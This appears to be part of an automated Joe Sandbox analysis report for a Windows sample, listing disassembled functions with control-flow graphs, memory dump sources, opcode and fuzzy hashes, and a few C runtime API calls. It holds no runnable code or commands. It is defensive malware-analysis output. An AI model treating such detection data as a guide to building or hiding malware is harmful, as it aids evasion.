                                                                                                                                                                                            control_flow_graph 3533 6c787e88-6c787e99 call 6c788630 3536 6c787eaa-6c787eb1 3533->3536 3537 6c787e9b-6c787ea1 3533->3537 3539 6c787ebd-6c787ed1 dllmain_raw 3536->3539 3540 6c787eb3-6c787eb6 3536->3540 3537->3536 3538 6c787ea3-6c787ea5 3537->3538 3541 6c787f83-6c787f92 3538->3541 3543 6c787f7a-6c787f81 3539->3543 3544 6c787ed7-6c787ee8 dllmain_crt_dispatch 3539->3544 3540->3539 3542 6c787eb8-6c787ebb 3540->3542 3545 6c787eee-6c787f00 call 6c787380 3542->3545 3543->3541 3544->3543 3544->3545 3548 6c787f29-6c787f2b 3545->3548 3549 6c787f02-6c787f04 3545->3549 3551 6c787f2d-6c787f30 3548->3551 3552 6c787f32-6c787f43 dllmain_crt_dispatch 3548->3552 3549->3548 3550 6c787f06-6c787f24 call 6c787380 call 6c787dd8 dllmain_raw 3549->3550 3550->3548 3551->3543 3551->3552 3552->3543 3554 6c787f45-6c787f77 dllmain_raw 3552->3554 3554->3543
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1823513121.000000006C771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C770000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823473675.000000006C770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823663685.000000006C794000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823970113.000000006C813000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6c770000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3136044242-0
                                                                                                                                                                                            • Opcode ID: 87cadc4d65266e6985ea89307ea9ca25262f41189b7d44011df05b00bd902e67
                                                                                                                                                                                            • Instruction ID: 3219fc177ab40acceef8cec4abb1e1cef2effe88d081af9386713f73c17f2a02
                                                                                                                                                                                            • Opcode Fuzzy Hash: 87cadc4d65266e6985ea89307ea9ca25262f41189b7d44011df05b00bd902e67
                                                                                                                                                                                            • Instruction Fuzzy Hash: 21219972F07155AFDB218E56CA44AAE3B79EF807D8F114135FA166BA10D3308D42DBE0
                                                                                                                                                                                            Function 6C787CD1 Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 3559 6c787cd1-6c787cdf call 6c788630 call 6c78831b 3563 6c787ce4-6c787ce7 3559->3563 3564 6c787ced-6c787d05 call 6c788220 3563->3564 3565 6c787dbe 3563->3565 3569 6c787d0b-6c787d1c call 6c78827d 3564->3569 3570 6c787dd0-6c787dd7 call 6c7884ba 3564->3570 3566 6c787dc0-6c787dcf 3565->3566 3575 6c787d6b-6c787d79 call 6c787db4 3569->3575 3576 6c787d1e-6c787d40 call 6c7885d7 call 6c78819b call 6c7881bf call 6c78ac97 3569->3576 3575->3565 3581 6c787d7b-6c787d85 call 6c7884b4 3575->3581 3576->3575 3595 6c787d42-6c787d49 call 6c788252 3576->3595 3587 6c787da6-6c787daf 3581->3587 3588 6c787d87-6c787d90 call 6c7883db 3581->3588 3587->3566 3588->3587 3594 6c787d92-6c787da4 3588->3594 3594->3587 3595->3575 3599 6c787d4b-6c787d68 call 6c78ac6c 3595->3599 3599->3575
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __RTC_Initialize.LIBCMT ref: 6C787D1E
                                                                                                                                                                                              • Part of subcall function 6C78819B: InitializeSListHead.KERNEL32(6C812220,6C787D28,6C799A90,00000010,6C787CB9,?,?,?,6C787EE1,?,00000001,?,?,00000001,?,6C799AD8), ref: 6C7881A0
                                                                                                                                                                                            • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6C787D88
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1823513121.000000006C771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C770000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823473675.000000006C770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823663685.000000006C794000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823970113.000000006C813000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6c770000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3231365870-0
                                                                                                                                                                                            • Opcode ID: 3147518013b2f75b636d19f13c410e6d232088f382e1eb769cde18b9a1c61410
                                                                                                                                                                                            • Instruction ID: 9b2adf686659f38833a91069674019c4616e35f162062f406a28a2a01055428e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3147518013b2f75b636d19f13c410e6d232088f382e1eb769cde18b9a1c61410
                                                                                                                                                                                            • Instruction Fuzzy Hash: F421A132747611AADB109BB4AB0E7ED77F09F1236CF20453AE76227FC2CB610148D6A5
                                                                                                                                                                                            Function 017B08B9 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 3745 17b08b9-17b0914 3748 17b0919-17b092e 3745->3748 3749 17b0e92 3748->3749 3750 17b0934 3748->3750 3766 17b0e95 call 17b0f98 3749->3766 3767 17b0e95 call 17b0ef8 3749->3767 3751 17b095a-17b0976 3750->3751 3752 17b0bf9-17b0bfd 3750->3752 3753 17b0cd9-17b0ce8 3750->3753 3751->3748 3755 17b0ee9-17b0ef1 3752->3755 3756 17b0c03-17b0c0a 3752->3756 3753->3748 3754 17b0e9b 3760 17b0ea2-17b0ee8 3754->3760 3756->3755 3758 17b0c10-17b0c21 3756->3758 3758->3748 3766->3754 3767->3754
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d02f5c6e32308cc4f0a1aea2ce176258fbaa470dab076608c8e8179c3e6432af
                                                                                                                                                                                            • Instruction ID: 220dd90ed0c803e652c4e736763d0e16469d2e5b4d2c53e0c4e082cd631d648a
                                                                                                                                                                                            • Opcode Fuzzy Hash: d02f5c6e32308cc4f0a1aea2ce176258fbaa470dab076608c8e8179c3e6432af
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F21D131A14205CFDB44DF79E99469BBBB3FB88300B20897AE415EB384DB34ED158B91
                                                                                                                                                                                            Function 017B3A70 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 3768 17b3a70-17b3ab9 3769 17b3ac3-17b3ad8 3768->3769 3770 17b3add-17b3af2 3769->3770 3771 17b3af8-17b3b82 3770->3771 3772 17b4103-17b4109 3770->3772 3771->3770
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d4cb5dff04dc3d88807f010b886f1a8782fd98c6e355138515afdfaa261877ff
                                                                                                                                                                                            • Instruction ID: 2b9a84f6a4f0c56641b0f5f25aa130a33a2995bf5c002b4c4727ab668b43e7dc
                                                                                                                                                                                            • Opcode Fuzzy Hash: d4cb5dff04dc3d88807f010b886f1a8782fd98c6e355138515afdfaa261877ff
                                                                                                                                                                                            • Instruction Fuzzy Hash: C2014731E152549FCB02CB74CC90ACA3FB3EF87310B0548E6D105EB696C6345D1AD3A2
                                                                                                                                                                                            Function 017B27A1 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 3774 17b27a1-17b27ba 3775 17b27c2 3774->3775 3787 17b27bc call 17b2861 3774->3787 3776 17b27c7-17b27dc 3775->3776 3777 17b27de 3776->3777 3778 17b283c-17b2840 3776->3778 3777->3775 3777->3778 3779 17b27fa-17b280a 3777->3779 3780 17b281e-17b2824 3777->3780 3781 17b280c-17b281c 3777->3781 3782 17b27e5-17b27f8 3777->3782 3779->3776 3783 17b282d 3780->3783 3784 17b2826-17b282b 3780->3784 3781->3776 3782->3776 3785 17b2832-17b283a 3783->3785 3784->3785 3785->3776 3787->3775
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a045435ae22cc4ed82cfc2161d0670d68d09d47a9f3e1febb32618b95dee88a1
                                                                                                                                                                                            • Instruction ID: 3b5e4ba097780265a042b06ee3d0d54b3942640879b579ee511547b511f0bd4c
                                                                                                                                                                                            • Opcode Fuzzy Hash: a045435ae22cc4ed82cfc2161d0670d68d09d47a9f3e1febb32618b95dee88a1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C0145327461509BC7084A799DC4B57FFABBBC9310308C9B7A109CB26ACB38E9118291
                                                                                                                                                                                            Function 017B1681 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 3788 17b1681-17b169d 3789 17b169f 3788->3789 3790 17b16e3-17b16f0 3788->3790 3791 17b16a4-17b16b9 3789->3791 3790->3791 3792 17b16bb 3791->3792 3793 17b1704-17b1708 3791->3793 3792->3789 3792->3790 3792->3793 3794 17b16c2-17b16c4 3792->3794 3795 17b16f2-17b1702 3792->3795 3796 17b16ce-17b16e1 3794->3796 3795->3791 3796->3791
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f0dc1f42c3a88a089df0363023267cb736dfd8f5c82d115af7342313a81097fd
                                                                                                                                                                                            • Instruction ID: a24b0969a12a46b6d797d97d9507839f292445613cf95c608e9817182321cfe1
                                                                                                                                                                                            • Opcode Fuzzy Hash: f0dc1f42c3a88a089df0363023267cb736dfd8f5c82d115af7342313a81097fd
                                                                                                                                                                                            • Instruction Fuzzy Hash: E5012472B285419BC3088E2AADD0692FBA6FFC531135CC5BBC009CBA14CB709815CA93
                                                                                                                                                                                            Function 017B27B0 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 3798 17b27b0-17b27bc call 17b2861 3799 17b27c2 3798->3799 3800 17b27c7-17b27dc 3799->3800 3801 17b27de 3800->3801 3802 17b283c-17b2840 3800->3802 3801->3799 3801->3802 3803 17b27fa-17b280a 3801->3803 3804 17b281e-17b2824 3801->3804 3805 17b280c-17b281c 3801->3805 3806 17b27e5-17b27f8 3801->3806 3803->3800 3807 17b282d 3804->3807 3808 17b2826-17b282b 3804->3808 3805->3800 3806->3800 3809 17b2832-17b283a 3807->3809 3808->3809 3809->3800
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 80d06d0d122d6037169e5a8675f6f3ae400ca44612a8e09358e22cf44e2d87a8
                                                                                                                                                                                            • Instruction ID: 37613ca12080eeaf0b431674748d5fe85a19ce2238af9614a735d99de4c52110
                                                                                                                                                                                            • Opcode Fuzzy Hash: 80d06d0d122d6037169e5a8675f6f3ae400ca44612a8e09358e22cf44e2d87a8
                                                                                                                                                                                            • Instruction Fuzzy Hash: B4017621B461519BC30C4A3A5DC0667FEAFB7C8620344C933A509CB26ACF74E91182D0
                                                                                                                                                                                            Function 017B2F18 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 3832 17b2f18-17b2f33 3834 17b2f47-17b2f88 3832->3834 3835 17b2f35-17b2f39 3832->3835 3836 17b2f41-17b2f44 3835->3836
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f6225d6b42d156651fa3730e4ba1cb0b49e181aa1517088e3d68ce89602808a8
                                                                                                                                                                                            • Instruction ID: 0a377232be7516ff214ee446e0c9386b4ec3878ebf48033f31a195b0f39858da
                                                                                                                                                                                            • Opcode Fuzzy Hash: f6225d6b42d156651fa3730e4ba1cb0b49e181aa1517088e3d68ce89602808a8
                                                                                                                                                                                            • Instruction Fuzzy Hash: A001F4332185A06FC306CA2DDC2489EFFA5EBC522170DC266E969C7646C334F8158BE0
                                                                                                                                                                                            Function 017B2861 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 339634f3bfc794f73bc28db22ed99f535b69dd5c063081d024880be2e61fdc22
                                                                                                                                                                                            • Instruction ID: 7676f6b977ab64ad3b0f0edd1bfa12bcc29076ebdd3fdf1c9c365c91d45876c0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 339634f3bfc794f73bc28db22ed99f535b69dd5c063081d024880be2e61fdc22
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7201AD71714144ABC755CE39AC90A66BBE6FBC9210B18C5AAE109CB396CA60AC229B51
                                                                                                                                                                                            Function 017B1AA1 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 3838 17b1aa1-17b1ad6 3840 17b1adb-17b1af0 3838->3840 3841 17b229a-17b229f call 17b2861 3840->3841 3842 17b1af6-17b1b84 3840->3842 3843 17b22a5-17b22b7 3841->3843 3845 17b1b8d 3842->3845 3846 17b1b86-17b1b8b 3842->3846 3847 17b1b92 3845->3847 3846->3847 3847->3840
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: e4a88b7f817ef0f48746bc82e2b8c6929b3470f826f78e4bb48050ae33ea2fea
                                                                                                                                                                                            • Instruction ID: bec94ac6dc81fea609e824d3c954b4c8dfa324748fdf37302969acb4d8a8eab4
                                                                                                                                                                                            • Opcode Fuzzy Hash: e4a88b7f817ef0f48746bc82e2b8c6929b3470f826f78e4bb48050ae33ea2fea
                                                                                                                                                                                            • Instruction Fuzzy Hash: 54014231605344CFCB258B28DC84999BBA7EF8A32071849AAE4029B391CF30AC20CB52
                                                                                                                                                                                            Function 017B0838 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d4a7c9777c4e331b1f34eeaad2ace0a506433246cb224c8e107684a99d8118dd
                                                                                                                                                                                            • Instruction ID: 7ba1f944b4ecefa8c6647461fabbd844a769a3e1ef244c17b5e873724d0322e0
                                                                                                                                                                                            • Opcode Fuzzy Hash: d4a7c9777c4e331b1f34eeaad2ace0a506433246cb224c8e107684a99d8118dd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 65F06270E14204EFCB44CFB5DD8569EBFF2EB99201F1585A6D805D7614F6348B119B41
                                                                                                                                                                                            Function 017B0848 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 142e8cb47a402af7f8a1887a8147fa33db928a6c3bbc8e076c9d4712394f2021
                                                                                                                                                                                            • Instruction ID: 22af9b509380658288b421950ba67e8f1f9dae09d423f3ba3dad62c6bfe25213
                                                                                                                                                                                            • Opcode Fuzzy Hash: 142e8cb47a402af7f8a1887a8147fa33db928a6c3bbc8e076c9d4712394f2021
                                                                                                                                                                                            • Instruction Fuzzy Hash: E2F05E70E44308EFCB84DFB9998529EFFF2EB85201F20C5A6E545D3614E7349B118B81
                                                                                                                                                                                            Function 017B2F09 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 500f9f8d294cfb2e3b4ea7273d2a368ffb4ffc9d4553d49ff37371651649d79b
                                                                                                                                                                                            • Instruction ID: b8b8e8970139ab6425ba4b626a6e324491dce4959d051ada791597f0c81ed7d7
                                                                                                                                                                                            • Opcode Fuzzy Hash: 500f9f8d294cfb2e3b4ea7273d2a368ffb4ffc9d4553d49ff37371651649d79b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 59E0DF32100450BFC712CE58DA4489AFFA5EB8531131AC252E449D721AC335E921CB90
                                                                                                                                                                                            Function 017B228D Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 87b42c53596f13bf7b003dfe3c5583d9223fde8f571d0599ef9a777e48a2e47d
                                                                                                                                                                                            • Instruction ID: 731c495d4a3bafe1d844a89198e1a7cf61ab1bccc92c6d0c6e42686766a306d4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 87b42c53596f13bf7b003dfe3c5583d9223fde8f571d0599ef9a777e48a2e47d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 69D05E36605308DFC7249B60EC58468B771FF85366760456EE10B46691C736A826CF40
                                                                                                                                                                                            Function 017B1EAB Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d84c2db59e460e9bd944caecec81f50dbc72542df4d996735ca52c29cfb8fe50
                                                                                                                                                                                            • Instruction ID: 6381f5291171f6c25ccd85bbfd040affe2d9b124fc95224b05e8cb90cf6425fd
                                                                                                                                                                                            • Opcode Fuzzy Hash: d84c2db59e460e9bd944caecec81f50dbc72542df4d996735ca52c29cfb8fe50
                                                                                                                                                                                            • Instruction Fuzzy Hash: 33E00974A01608CBCB14CFA5CA909DDFBF2EB8D221B649269D806A2354D635AE46CB21
                                                                                                                                                                                            Function 017B212E Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: de0dad515350b9cc55f7eaaa64db9d11cbd8855dfec02bb0f5af210f7dc26381
                                                                                                                                                                                            • Instruction ID: 7a2ce06e24e7fbfb755698808132cb9e906e07f61f62b08da288e877ccfc25e4
                                                                                                                                                                                            • Opcode Fuzzy Hash: de0dad515350b9cc55f7eaaa64db9d11cbd8855dfec02bb0f5af210f7dc26381
                                                                                                                                                                                            • Instruction Fuzzy Hash: FBD0A934210300DBC7608B30E94172AB3B2BB89300F11550AD14786BA0C230A0408E00
                                                                                                                                                                                            Function 017B40E0 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 670b845084956f01fbde49b3d4a69d95575d808eace86107157665aed00b3f48
                                                                                                                                                                                            • Instruction ID: eee42e69a645e8050d5a3a0a921f6ae0de28d7cf5dc474edfe976869f73d8325
                                                                                                                                                                                            • Opcode Fuzzy Hash: 670b845084956f01fbde49b3d4a69d95575d808eace86107157665aed00b3f48
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4CC02B30B200004AC384E634E8C8ACCF271FF441C0750481B64003F0B9CF208E014841